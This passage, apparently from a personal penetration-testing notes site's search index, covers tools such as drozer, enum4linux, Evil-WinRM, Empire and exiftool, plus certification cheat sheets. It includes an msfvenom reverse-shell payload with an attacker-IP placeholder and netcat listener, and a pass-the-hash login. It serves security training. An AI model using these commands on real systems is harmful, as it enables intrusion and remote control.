Preinstalled on Kali Linux: dnsrecon is a simple Python script that enables you to gather DNS-oriented information on a given target.

                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dnsrecon/#basic-usage","title":"Basic usage","text":"
                        dnsrecon -d example.com\n
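dnsrecon can also attempt a zone transfer by selecting the scan type with -t (axfr is one of the supported types):

dnsrecon -d example.com -t axfr\n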
                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"docker/","title":"docker","text":"","tags":["docker"]},{"location":"docker/#installation","title":"Installation","text":"

First, make sure that you have Docker Engine, Docker Compose and nginx installed:

                        sudo apt install docker docker-compose nginx\n

                        Depending on the image you are going to compose you will need nginx or other dependencies.

                        ","tags":["docker"]},{"location":"docker/#basic-commands","title":"Basic commands","text":"
# Show all containers (running and stopped)\ndocker ps -a\n\n# Actions on a container (by name, PID, or a unique prefix of its ID): restart, stop, start, status\nsudo docker <restart/stop/start/status> <nameOfDockerInstance/PID/partOfIDifUnique>\n\n# Create the first docker instance: Hello, world! It pulls the image from Docker Hub\nsudo docker run hello-world\n# run: build and deploy an instance\n# by default, docker saves everything in /var/lib/docker\n\n# Run a single command or an interactive terminal in a new container\nsudo docker run -it <image> <command>\n# image: for instance, debian\n# <command>: for instance, `echo lala`, or `/bin/bash` for an interactive shell\n
                        ","tags":["docker"]},{"location":"dotpeek/","title":"dotPeek - A tool for decompiling","text":"

                        dotPeek is a tool by JetBrains.

                        "},{"location":"dotpeek/#installation","title":"Installation","text":"

                        Download from: https://www.jetbrains.com/es-es/decompiler/download/#section=web-installer

                        "},{"location":"dread/","title":"Microsoft DREAD","text":"

                        Microsoft DREAD. DREAD is a risk assessment system developed by Microsoft to help IT security professionals evaluate the severity of security threats and vulnerabilities. It is used to perform a risk analysis by using a scale of 10 points to assess the severity of security threats and vulnerabilities. With this, we calculate the risk of a threat or vulnerability based on five main factors:

                        • Damage Potential
                        • Reproducibility
                        • Exploitability
                        • Affected Users
                        • Discoverability
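A common convention (each factor rated from 0 to 10) is to average the five scores to obtain the overall risk:

Risk = (Damage + Reproducibility + Exploitability + Affected Users + Discoverability) / 5\n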
                        ","tags":["dread","cvss"]},{"location":"drozer/","title":"drozer - A security testing framework for Android","text":"

                        drozer (formerly Mercury) is the leading security testing framework for Android.

                        drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

                        drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering.

                        ","tags":["mobile pentesting"]},{"location":"drozer/#installation","title":"Installation","text":"

                        Instructions from: https://github.com/WithSecureLabs/drozer

                        Also, you can download it from: https://github.com/FSecureLABS/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk

                        adb install drozer-agent-2.3.4.apk\npip install twisted\n

Prerequisites: JDK 1.6 (Java 1.6), Python 2.7, Android SDK, adb.

Note: Java 1.6 is mandatory since Android bytecode is only compliant with version 1.6 and no higher.

1. Install Genymotion and get a device, for instance a Samsung Galaxy S6, running in VirtualBox.
2. Go to the drozer app and turn on the server. You will get a message on the app saying that port 31415 is now on.
                        3. From the terminal, we redirect the port with:
                          adb connect IPDevice:PORT\nadb forward tcp:31415 tcp:31415\n
4. Now we connect to the drozer console:
                          drozer console connect\n

                        For this to work, we need to have:

• The device set to Host-Only + NAT mode.
• Kali set to Host-Only + NAT mode.

Also, both connections need to be running on the same interface (ethN).

                        ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands","title":"Basic commands","text":"

                        These commands run on a drozer terminal:

                        # Display the apps installed on the device.\nrun app.package.list\n\n# Display only the apps with identifier lala\nrun app.package.list -f lala\n\n# Log debug information\nlog.d\n\n# Log system information\nlog.i\n\n# Log error information\nlog.e\n
                        ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands-on-packages","title":"Basic commands on packages","text":"
# Display available commands.\nrun + TAB\n\n# Show the manifest of a given app.\nrun app.package.manifest nameOfApp\n\n# Show generic information about the app\nrun app.package.info -a nameOfApp\n\n# Display the attack surface: a summary of activities, content providers, services, exported activities and whether the app is debuggable.\nrun app.package.attacksurface nameOfApp\n
                        ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands-on-activities","title":"Basic commands on activities","text":"
                        # Show generic information about the activities\nrun app.activity.info -a nameOfApp\n\n# Display an activity on a device\nrun app.activity.start --component nameOfApp nameOfApp.nameOfActivity\n
                        ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands-on-providers","title":"Basic commands on providers","text":"
# Display existing providers.\nrun app.provider.info -a nameOfApp\n\n# Display the location of providers. It uses the content:// protocol\nrun app.provider.finduri nameOfApp\n\n# Display the database information of the provider.\nrun app.provider.query uriOfProvider\n
                        ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands-on-scanners","title":"Basic commands on scanners","text":"
                        # To see all tests and scans you can run with drozer on your app.\nrun scanner. +TAB\n\n# Test the app to see if it is vulnerable to an injection.\nrun scanner.provider.injection -a nameOfApp\n\n# Check out if the App is vulnerable to a traversal attack\nrun scanner.provider.traversal -a nameOfApp\n
                        ","tags":["mobile pentesting"]},{"location":"echo-mirage/","title":"Echo Mirage","text":"","tags":["windows","thick applications","traffic tool"]},{"location":"echo-mirage/#installation","title":"Installation","text":"

Download from Google Drive (https://drive.google.com/open?id=1JE70HH-CNd_VIl190sheL72w3P5dYK58) or from Mega.nz (https://mega.nz/#!lRtUzApC!2hBLDnNiOZJ87Z9kmgFfwDLDvWZUBixGpZrTVtuYHSI).

                        ","tags":["windows","thick applications","traffic tool"]},{"location":"ejpt/","title":"eJPT - eLearnSecurity Junior Penetration Tester Cheat Sheet","text":"

                        What is eJPT? The eJPT is\u00a0a 100% hands-on certification for penetration testing and essential information security skills.

                        I'm more than happy to share my personal cheat sheet of the #eJPT Preparation exam.

                        ","tags":["pentesting"]},{"location":"ejpt/#subdomain-enumeration","title":"Subdomain enumeration","text":"Tool + Cheat sheet What it does Google dorks Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. Sublist3r Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. crt.sh It collects information about SSL certificates. If you visit a domain and it contains a certificate you can extract other subdomain by using the View Certificate functionality. dnscan Python wordlist-based DNS subdomain scanner. amass In depth DNS Enumeration and network mapping.","tags":["pentesting"]},{"location":"ejpt/#footprinting-scanning","title":"Footprinting & Scanning","text":"Tool + Cheat sheet What it does ping ping works by sending one or more special ICMP packets (Type 8 - echo request) to a host. If the destination host replies with ICMP echo reply packets, then the host is alive. fping Linux tool which is an improved version of the ping utility. nmap Network Mapper is an open source tool for network exploration and security auditing. Free and open-source scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packages and analyzing the responses. p0f P0f is a tool that utilizes an array of sophisticated, purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications (often as little as a single normal SYN) without interfering in any way. masscan Masscan was designed to deal with large networks and to scan thousands of Ip addresses at once. It\u2019s faster than nmap but probably less accurate.","tags":["pentesting"]},{"location":"ejpt/#enumeration-tools","title":"Enumeration tools","text":"Tool + Cheat sheet URL dirb DIRB is a web content fingerprinting tool. It scans the web server for directories using a dictionary file feroxbuster FEROXBUSTER is a web content fingerprintinf tool that uses brute force combined with a wordlist to search for unlinked content in target directories. httprint HTTPRINT is a web server fingerprinting tool. It identifies web servers and detects web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc. wpscan WPSCAN is a wordpress security scanner.","tags":["pentesting"]},{"location":"ejpt/#dictionaries","title":"Dictionaries","text":"

                        List of dictionaries.

                        Tool + Cheat sheet What it does crunch Generate combinations of words and manglings to be used later off as attacking dictionaries.","tags":["pentesting"]},{"location":"ejpt/#vulnerability-assessment-scanners","title":"Vulnerability assessment: scanners","text":"Available scanners + Cheat sheet URL Nessus https://www.tenable.com/downloads/nessus OpenVAS https://www.openvas.org/ Nexpose https://www.rapid7.com/products/nexpose/ GFOLAnGuard https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard","tags":["pentesting"]},{"location":"ejpt/#toolstecniques-for-network-exploitation","title":"Tools/tecniques for network exploitation","text":"Tool + Cheat sheet What it does netcat netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. openSSL OpenSSL is a software library for applications that provide secure communications over computer networks against eavesdropping or need to identify the party at the other end. It is widely used by Internet servers, including the majority of HTTPS websites. Registry creation Registries in the victim machine may be used to save a connection to the attacker machine.","tags":["pentesting"]},{"location":"ejpt/#web-pentesting","title":"Web pentesting","text":"Vulnerability / Technique What it does Tool Backdoors with netcat Buffer Overflow attacks A buffer is an area in the RAM (Random Access Memory) reserved for temporary data storage. If a developer does not enforce buffer\u2019s limits, an attacker could find a way to write data beyond those limits. Remote Code Execution RCE\u00a0attacks involve attackers manipulating network traffic by exploiting code vulnerabilities to access a corporate system. XSS attack - Cross-site Scripting attack Cross-Site Scripting attacks or XSS attacks enable attackers to inject client-side scripts into web pages. This is done through an URL than the attacker sends. Crafted in the URL, this js payload is injected. xsser SQL injection SQL stands for Structure Query Language. SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. sqlmap","tags":["pentesting"]},{"location":"ejpt/#password-cracker","title":"Password cracker","text":"Tool + Cheat sheet What it does ophcrack Ophcrack is a free Windows password cracker based on rainbow tables. It is a efficient implementation of rainbow tables. It comes with a Graphical User Interface and runs on multiple platforms. hashcat Hashcat is a password recovery tool. It had a proprietary code base until 2015, but was then released as open source software. Versions are available for Linux, OS X, and Windows. wikipedia. John the Ripper John the Ripper is one of those tools that can be used for several things: hash cracker and dictionary attack. hydra Hydra can attack nearly 50 services including: Cisco auth, FTP, HTTP, IMAP, RDP, SMB, SSH, Telnet... It uses modules for each protocol.","tags":["pentesting"]},{"location":"ejpt/#dictionary-attacks","title":"Dictionary attacks","text":"Tool + Cheat sheet What it does John the Ripper John the Ripper is one of those tools that can be used for several things: hash cracker and dictionary attack. hydra Hydra can attack nearly 50 services including: Cisco auth, FTP, HTTP, IMAP, RDP, SMB, SSH, Telnet... It uses modules for each protocol.","tags":["pentesting"]},{"location":"ejpt/#windows","title":"Windows","text":"

                        Introduction about NetBIOS.

Vulnerability / Technique What it does Tools Null session attack This attack exploits an authentication vulnerability for Windows Administrative Shares. Manual attack, Winfo, enum, enum4linux, samrdump.py, nmap script Arp poisoning This attack is performed by sending gratuitous ARP replies. arpspoof Remote Code Execution RCE\u00a0attacks involve attackers manipulating network traffic by exploiting code vulnerabilities to access a corporate system. Burpsuite and Wireshark","tags":["pentesting"]},{"location":"ejpt/#linux","title":"Linux","text":"

                        Spawn a shell. msfvenom.
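A minimal msfvenom sketch for generating a Linux reverse-shell ELF (the payload choice, LHOST and LPORT are illustrative):

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attackerIP> LPORT=4444 -f elf -o shell.elf\n# On the attacker machine, catch it with: nc -lnvp 4444\n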

                        ","tags":["pentesting"]},{"location":"ejpt/#lateral-movements","title":"Lateral movements","text":"

                        Lateral movements

                        ","tags":["pentesting"]},{"location":"emacs/","title":"emacs - A text editor... and more","text":""},{"location":"emacs/#syntax","title":"Syntax","text":"

                        Before starting, it is convenient to consider the syntax we'll be using:

C-<char>\nHold the CTRL key while pressing the character.\n\nM-<char>\nHold the ALT key while pressing the character.\n\nESC <char>\nPress the ESC key, and after that press the character.\n\nC <char>\nPress the CTRL key, and after that press the character.\n\nM <char>\nPress the ALT key, and after that press the character.\n
                        "},{"location":"emacs/#basic-commands","title":"Basic commands","text":"

Disclaimer: when creating this cheat sheet, I've realized that I'm totally in love with emacs, meaning this article is full of biased comments. Neutrality is overrated.

                        "},{"location":"emacs/#session-and-process-management","title":"Session and process management","text":"
# Close session. It will ask if you want to save the buffers.\nC-x C-c\n\n# Cancel a running process.\nC-g\n\n# Remove all open windows and expand the window that contains the active cursor position\nC-x 1\n
                        "},{"location":"emacs/#cursor-movement","title":"Cursor Movement","text":"

Unlike in vim or neovim, "cursor mode" and "insert mode" go together in emacs, meaning you can insert any character wherever the cursor is without having to switch from one mode to another.

There is also a small but significant difference. Emacs includes a blank character at the end of the line. This alone can sound very vague, but it allows you to move in a more natural and human way from the beginning of one line to the end of the previous one. Just this silly feature makes me love emacs more than vim (#sorryVimDudes).

# Go to previous line.\nC-p\n\n# Go to next line.\nC-n\n\n# Move cursor position one character forwards.\nC-f\n\n# Move cursor position one character backwards.\nC-b\n\n# Go to the beginning of the line.\nC-a\n\n# Go to the end of the line.\nC-e\n\n# Go to the beginning of the sentence.\nM-a\n\n# Go to the end of the sentence.\nM-e\n\n# Go to the beginning of the file.\nM-<\n\n# Go to the end of the file.\nM->\n
                        "},{"location":"emacs/#deleting","title":"Deleting","text":"
                        # Remove following word\nM-d\n\n# Remove previous word\nM-DEL\n\n# Remove from the cursor position to the end of the line\nC-k\n\n# Remove from the cursor position to the end of the sentence\nM-k\n\n# Select from here to the position where you've moved the cursor. \nC-Space\nDEL\n
                        "},{"location":"emacs/#clipboard","title":"Clipboard","text":"

Another cool functionality in emacs is that the clipboard has history. If having a blank character at the end of the line wasn't enough to fall in love with emacs, now you have no excuses. The ability to navigate through the history of yanked text turns emacs into exactly what you have been dreaming of.

                        # Browse the clipboard to older yanked text. \nM-y\n
                        "},{"location":"emacs/#undo","title":"Undo","text":"
                        # Three ways to undo an action text related (non cursor position related).\nC-/\nC-_\nC-x u\n
                        "},{"location":"emacs/#buffers","title":"Buffers","text":"

                        Also, browsing your buffers in emacs is insanely easy. One more reason to love emacs.

                        The emacs autosaved file has this syntax:

                        #nameOfAutosavedFile;\n
# List your buffers.\nC-x C-b\n\n# Get rid of the list with all buffers.\nC-x 1\n\n# Go to a specific buffer (normally all of them are wrapped up between * *).\nC-x b <nameOfBuffer>\n\n# Enter a minibuffer\nM-x\n\n# Get out of a minibuffer (in this case C-g doesn't work).\nESC ESC ESC\n
                        "},{"location":"emacs/#file-management","title":"File management","text":"
# Save in bulk. It will ask if you want to save your buffers one by one.\nC-x s\n\n# To recover a file:\n# Open the non-saved file with\nemacs nameOfNonSavedFile\nM-x recover-file RETURN\nYes ENTER\n
                        "},{"location":"emacs/#modes","title":"Modes","text":"
                        # Change to fundamental mode.\nM-x fundamental-mode\n\n# Change to text mode.\nM-x text-mode\n\n# Activate or deactivate autofill mode.\nM-x auto-fill-mode RETURN\n
                        "},{"location":"emacs/#search","title":"Search","text":"
                        # Search for an expression forwards.\nC-s\n\n# Search for an expression backwards.\nC-r\n
                        "},{"location":"emacs/#windows-management","title":"Windows management","text":"

Only a few things can compete with the beauty of the i3 window manager, and in my opinion emacs is not as neat and direct as i3. Still, even though emacs is not exactly a window management tool, it manages its windows in a quite easy way:

                        # Divide vertically current window in two.\nC-x 2\n\n# Divide horizontally current window in two.\nC-x 3\n\n# Move cursor position to the other window.\nC-x o\n\n# Open a file in a different window below.\nC-x 4 C-f nameOfFile\n\n# Create a new and independent window.\nM-x make-frame\n\n# Remove/close the window.\nM-x delete-frame\n
                        "},{"location":"emacs/#help","title":"Help","text":"
                        # Show documentation about a command.\nC-h k command\n\n# Describe a command.\nC-h x command\n\n# Open available manuals.\nC-h i\n
                        "},{"location":"empire/","title":"Empire","text":"

                        Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent.

Basically, you can run PowerShell agents without having to run powershell.exe.

                        ","tags":["post exploitation"]},{"location":"empire/#installation","title":"Installation","text":"
                        git clone https://github.com/EmpireProject/Empire.git\nEmpire/setup/install.sh\n
                        ","tags":["post exploitation"]},{"location":"empire/#usage","title":"Usage","text":"","tags":["post exploitation"]},{"location":"enum/","title":"enum","text":"

                        Enum is a console-based Win32 information enumeration utility. Using null sessions, enum can retrieve userlists, machine lists, sharelists, namelists, group and member lists, password and LSA policy information. enum is also capable of a rudimentary brute force dictionary attack on individual accounts.\u00a0

                        ","tags":["windows","enumeration"]},{"location":"enum/#installation","title":"Installation","text":"

                        Download it from: https://packetstormsecurity.com/search/?q=win32+enum&s=files.

                        ","tags":["windows","enumeration"]},{"location":"enum/#basic-commands","title":"Basic commands","text":"
# Enumerates shares\nenum.exe -s $ip\n\n# Enumerates users\nenum.exe -u $ip\n\n# Displays the password policy in case you need to mount a network authentication attack\nenum.exe -p $ip\n
                        ","tags":["windows","enumeration"]},{"location":"enum4linux/","title":"enum4linux","text":"

enum4linux is a PERL script used to exploit null session attacks. The\u00a0original tool\u00a0was written in Perl by Mark Lowe and\u00a0later rewritten in Python. Essentially it does something similar to winfo and enum.

                        ","tags":["windows","enumeration"]},{"location":"enum4linux/#installation","title":"Installation","text":"

                        Preinstalled in kali.

                        ","tags":["windows","enumeration"]},{"location":"enum4linux/#basic-commands","title":"Basic commands","text":"
# Enumerate shares\nenum4linux -S $ip\n\n# Enumerate users\nenum4linux -U $ip\n\n# Enumerate machine list\nenum4linux -M $ip\n\n# Specify username to use (default \u201c\u201d)\nenum4linux -u <username> $ip\n\n# Specify password to use (default \u201c\u201d)\nenum4linux -p <password> $ip\n\n# Brute force share names from a file\nenum4linux -s /usr/share/enum4linux/share-list.txt $ip\n\n# Do a nmblookup (similar to nbtstat)\nenum4linux -n $ip\n# In the result, the <20> flag means there are shared resources\n\n# Enumerate the password policy of the remote system. Useful to mount a network authentication attack\nenum4linux -P $ip\n

                        If you want to run all these commands in one line:

enum4linux -a $ip\n
                        ","tags":["windows","enumeration"]},{"location":"evil-winrm/","title":"Evil-WinRm","text":"

                        Evil-WinRM connects to a target using the Windows Remote Management service combined with the PowerShell Remoting Protocol to establish a PowerShell session with the target.

Installed on Kali by default. See winrm.

                        ","tags":["tools","active directory","windows remote management"]},{"location":"evil-winrm/#basic-usage","title":"Basic usage","text":"

                        Example from HTB machine: Responder.

evil-winrm -i $ip -u <username> -p <password>\n\nevil-winrm -i $ip -u Administrator -H \"<passwordhash>\"\n# -H: NTLM hash (pass-the-hash)\n
                        ","tags":["tools","active directory","windows remote management"]},{"location":"ewpt-preparation/","title":"eWPT Preparation","text":"Module Course (name and link) My notes on HackingLife 01 Introduction to Web application testing -HTTP and HTTPs- Phases of a web application security testing 02 Web Enumeration & Information Gathering Information gathering 03 WAPT: Web proxies and Web Information Gathering - BurpSuite- OWASP Zap 04 XSS Attacks - Cross Site Script vulnerabilities.- XSSer 05 SQL Injection Attacks - SQL injection: mysql, mssql, postgreSQL, mariadb, oracle database - NoSQL injection: sqlite, mongodb, redis - SQLi Cheat sheet for manual injection - Burpsuite Labs 06 Testing for common attacks - Testing HTTP Methods- Attacking basic and digest authentication, and OTP- Session management- Session fixation- Session highjacking- CSRF- Command injections- RCE attack - Remote Code Execution 07 File and Resource attacks - Arbitrary File Upload- Directory Traversal attack- Local File Inclusion (LFI)- Remote File Inclusion (RFI) 08 Web Service Security testing - Web services 09 CMS Security testing - Pentesting wordpress 10 Encoding, Filtering & Evasion - Data encoding- Input filtering

                        eWPTX

                        Module Course name My notes on HackingLife 01 Encoding and filtering - Data encoding- Input filtering 02 Evasion Basics 03 Cross-Site Scripting - Cross Site Script vulnerabilities. 04 Filter evasion and WAF Bypasssing 05 Cross-Site Request Forgery 06 HTML 5 07 SQL Injection 08 SQLi - Filter Evasion and WAF Bypassing 09 XML Attacks 10 Attacking Serialization 11 Server Side Attacks 12 Attacking Crypto 13 Attacking Authentication & SSO 14 Pentesting APIs & Cloud Applications 15 Attacking LDAP-based Implementations","tags":["course","certification","web pentesting"]},{"location":"exiftool/","title":"exiftool - A tool for metadata edition","text":"

                        ExifTool is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files. ExifTool supports many different metadata formats including EXIF, GPS, IPTC, XMP, JFIF, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP and ID3, Lyrics3, as well as the maker notes of many digital cameras by Canon, Casio, DJI, FLIR, FujiFilm, GE, GoPro, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Motorola, Nikon, Nintendo, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Phase One, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon and Sony.

                        ExifTool can\u00a0Read,\u00a0Write and/or\u00a0Create files in the following formats. Also listed are the support levels for EXIF, IPTC (IIM), XMP, ICC_Profile, C2PA (JUMBF) and other metadata types for each file format. C2PA metadata is not currently\u00a0Writable, but may be\u00a0Deleted from some file types by deleting the JUMBF group (ie.\u00a0-JUMBF:all=).

                        ","tags":["pentesting","file"]},{"location":"exiftool/#installation","title":"Installation","text":"

                        Download from https://exiftool.org/index.html.

                        ","tags":["pentesting","file"]},{"location":"exiftool/#basic-usage","title":"Basic usage","text":"
                        # Print common meta information for all images in \"dir\".  \"-common\" is a shortcut tag representing common EXIF meta information.\nexiftool -common dir\n\n# List specified meta information in tab-delimited column form for all images in \"dir\" to an output text file named \"out.txt\".\nexiftool -T -createdate -aperture -shutterspeed -iso dir > out.txt\n\n# Print ImageSize and ExposureTime tag names and values.\nexiftool -s -ImageSize -ExposureTime b.jpg\n\n\n# Print standard Canon information from two image files.\nexiftool -l -canon c.jpg d.jpg\n\n# Recursively extract common meta information from files in \"pictures\" directory, writing text output to \".txt\" files with the same names.\nexiftool -r -w .txt -common pictures\n\n# Save thumbnail image from \"image.jpg\" to a file called \"thumbnail.jpg\".\nexiftool -b -ThumbnailImage image.jpg > thumbnail.jpg\n\n# Recursively extract JPG image from all Nikon NEF files in the current directory, adding \"_JFR.JPG\" for the name of the output JPG files.\nexiftool -b -JpgFromRaw -w _JFR.JPG -ext NEF -r .\n\n# Extract all types of preview images (ThumbnailImage, PreviewImage, JpgFromRaw, etc.) from files in directory \"dir\", adding the tag name to the output preview image file names.\nexiftool -a -b -W %d%f_%t%-c.%s -preview:all dir\n\n# Print formatted date/time for all JPG files in the current directory.\nexiftool -d '%r %a, %B %e, %Y' -DateTimeOriginal -S -s -ext jpg \n\n# Extract image resolution from EXIF IFD1 information (thumbnail image IFD)\nexiftool -IFD1:XResolution -IFD1:YResolution image.jpg\n\n# Extract all tags with names containing the word \"Resolution\" from an image.\nexiftool '-*resolution*' image.jpg\n\n# Extract all author-related XMP information from an image.\nexiftool -xmp:author:all -a image.jpg\n\n# Extract complete XMP data record intact from \"a.jpg\" and write it to \"out.xmp\" using the special \"XMP\" tag (see the Extra tags in Image::ExifTool::TagNames).\nexiftool -xmp -b a.jpg > out.xmp\n
                        ","tags":["pentesting","file"]},{"location":"exiftool/#tag-names","title":"Tag names","text":"

                        See table with all tag names: https://exiftool.org/TagNames/.

                        A\u00a0Tag Name\u00a0is the handle by which the information is accessed in ExifTool. Tag names are entered on the command line with a leading '-', in the order you want them displayed. Valid characters in a tag name are A-Z (case is not significant), 0-9, hyphen (-) and underline (_). The tag name may be prefixed by a\u00a0group name\u00a0(separated by a colon) to identify a specific information type or location. A special tag name of \"All\" may be used to represent all tags, or all tags in a specified group. For example:
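# Illustrative invocations (the file name is a placeholder)\nexiftool -DateTimeOriginal image.jpg\n\n# The same tag prefixed with its group name\nexiftool -EXIF:DateTimeOriginal image.jpg\n\n# The special \"All\" tag restricted to one group\nexiftool -EXIF:All image.jpg\n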

                        ","tags":["pentesting","file"]},{"location":"exiftool/#tag-groups","title":"Tag groups","text":"

                        See all info related to Tag groups

                        ExifTool classifies tags into groups in various families. Here is a list of the group names in each family:

                        Family Group Names 0 (Information\u00a0Type) AAC, AFCP, AIFF, APE, APP0, APP1, APP11, APP12, APP13, APP14, APP15, APP2, APP3, APP4, APP5, APP6, APP7, APP8, APP9, ASF, Audible, Canon, CanonVRD, Composite, DICOM, DNG, DV, DjVu, Ducky, EXE, EXIF, ExifTool, FITS, FLAC, FLIR, File, Flash, FlashPix, Font, FotoStation, GIF, GIMP, GeoTiff, GoPro, H264, HTML, ICC_Profile, ID3, IPTC, ISO, ITC, JFIF, JPEG, JSON, JUMBF, Jpeg2000, LNK, Leaf, Lytro, M2TS, MIE, MIFF, MISB, MNG, MOI, MPC, MPEG, MPF, MXF, MakerNotes, Matroska, Meta, Ogg, OpenEXR, Opus, PDF, PICT, PLIST, PNG, PSP, Palm, PanasonicRaw, Parrot, PhotoCD, PhotoMechanic, Photoshop, PostScript, PrintIM, QuickTime, RAF, RIFF, RSRC, RTF, Radiance, Rawzor, Real, Red, SVG, SigmaRaw, Sony, Stim, Theora, Torrent, Trailer, VCard, Vorbis, WTV, XML, XMP, ZIP 1\u00a0(Specific\u00a0Location) AAC, AC3, AFCP, AIFF, APE, ASF, AVI1, Adobe, AdobeCM, AdobeDNG, Apple, Audible, CBOR, CIFF, CameraIFD, Canon, CanonCustom, CanonDR4, CanonRaw, CanonVRD, Casio, Chapter#, Composite, DICOM, DJI, DNG, DV, DjVu, DjVu-Meta, Ducky, EPPIM, EXE, EXIF, ExifIFD, ExifTool, FITS, FLAC, FLIR, File, Flash, FlashPix, Font, FotoStation, FujiFilm, FujiIFD, GE, GIF, GIMP, GPS, GSpherical, Garmin, GeoTiff, GlobParamIFD, GoPro, GraphConv, H264, HP, HTC, HTML, HTML-dc, HTML-ncc, HTML-office, HTML-prod, HTML-vw96, HTTP-equiv, ICC-chrm, ICC-clrt, ICC-header, ICC-meas, ICC-meta, ICC-view, ICC_Profile, ICC_Profile#, ID3, ID3v1, ID3v1_Enh, ID3v2_2, ID3v2_3, ID3v2_4, IFD0, IFD1, IPTC, IPTC#, ISO, ITC, InfiRay, Insta360, InteropIFD, ItemList, JFIF, JFXX, JPEG, JPEG-HDR, JPS, JSON, JUMBF, JVC, Jpeg2000, KDC_IFD, Keys, Kodak, KodakBordersIFD, KodakEffectsIFD, KodakIFD, KyoceraRaw, LNK, Leaf, LeafSubIFD, Leica, Lyrics3, Lytro, M-RAW, M2TS, MAC, MIE-Audio, MIE-Camera, MIE-Canon, MIE-Doc, MIE-Extender, MIE-Flash, MIE-GPS, MIE-Geo, MIE-Image, MIE-Lens, MIE-Main, MIE-MakerNotes, MIE-Meta, MIE-Orient, MIE-Preview, MIE-Thumbnail, MIE-UTM, MIE-Unknown, MIE-Video, MIFF, MISB, MNG, MOBI, MOI, MPC, MPEG, MPF0, MPImage, MS-DOC, MXF, MacOS, MakerNotes, MakerUnknown, Matroska, MediaJukebox, Meta, MetaIFD, Microsoft, Minolta, MinoltaRaw, Motorola, NITF, Nikon, NikonCapture, NikonCustom, NikonScan, NikonSettings, NineEdits, Nintendo, Ocad, Ogg, Olympus, OpenEXR, Opus, PDF, PICT, PNG, PNG-cICP, PNG-pHYs, PSP, Palm, Panasonic, PanasonicRaw, Parrot, Pentax, PhaseOne, PhotoCD, PhotoMechanic, Photoshop, PictureInfo, PostScript, PreviewIFD, PrintIM, ProfileIFD, Qualcomm, QuickTime, RAF, RAF2, RIFF, RMETA, RSRC, RTF, Radiance, Rawzor, Real, Real-CONT, Real-MDPR, Real-PROP, Real-RA3, Real-RA4, Real-RA5, Real-RJMD, Reconyx, Red, Ricoh, SPIFF, SR2, SR2DataIFD, SR2SubIFD, SRF#, SVG, Samsung, Sanyo, Scalado, Sigma, SigmaRaw, Sony, SonyIDC, Stim, SubIFD, System, Theora, Torrent, Track#, UserData, VCalendar, VCard, VNote, Version0, Vorbis, WTV, XML, XMP, XMP-DICOM, XMP-Device, XMP-GAudio, XMP-GCamera, XMP-GCreations, XMP-GDepth, XMP-GFocus, XMP-GImage, XMP-GPano, XMP-GSpherical, XMP-LImage, XMP-MP, XMP-MP1, XMP-PixelLive, XMP-aas, XMP-acdsee, XMP-album, XMP-apple-fi, XMP-ast, XMP-aux, XMP-cc, XMP-cell, XMP-crd, XMP-creatorAtom, XMP-crs, XMP-dc, XMP-dex, XMP-digiKam, XMP-drone-dji, XMP-dwc, XMP-et, XMP-exif, XMP-exifEX, XMP-expressionmedia, XMP-extensis, XMP-fpv, XMP-getty, XMP-hdr, XMP-hdrgm, XMP-ics, XMP-iptcCore, XMP-iptcExt, XMP-lr, XMP-mediapro, XMP-microsoft, XMP-mwg-coll, XMP-mwg-kw, XMP-mwg-rs, XMP-nine, XMP-panorama, XMP-pdf, XMP-pdfx, XMP-photomech, XMP-photoshop, XMP-plus, XMP-pmi, XMP-prism, 
XMP-prl, XMP-prm, XMP-pur, XMP-rdf, XMP-sdc, XMP-swf, XMP-tiff, XMP-x, XMP-xmp, XMP-xmpBJ, XMP-xmpDM, XMP-xmpDSA, XMP-xmpMM, XMP-xmpNote, XMP-xmpPLUS, XMP-xmpRights, XMP-xmpTPg, ZIP, iTunes 2\u00a0(Category) Audio, Author, Camera, Device, Document, ExifTool, Image, Location, Other, Preview, Printing, Time, Unknown, Video 3\u00a0(Document\u00a0Number) Doc#, Main 4\u00a0(Instance\u00a0Number) Copy# 5\u00a0(Metadata\u00a0Path) eg. JPEG-APP1-IFD0-ExifIFD 6\u00a0(EXIF/TIFF\u00a0Format) int8u, string, int16u, int32u, rational64u, int8s, undef, int16s, int32s, rational64s, float, double, ifd, unicode, complex, int64u, int64s, ifd64 7\u00a0(Tag\u00a0ID) ID-xxx (where xxx is the tag ID. Numerical ID's are given in hex with a leading \"0x\" if the\u00a0HexTagIDs API option\u00a0is set, as are characters in non-numerical ID's which are not valid in a group name. Note that unlike other group names, family 7 group names are case sensitive.) 8\u00a0(File\u00a0Number) File# (for files loaded via\u00a0-file_NUM_\u00a0option)

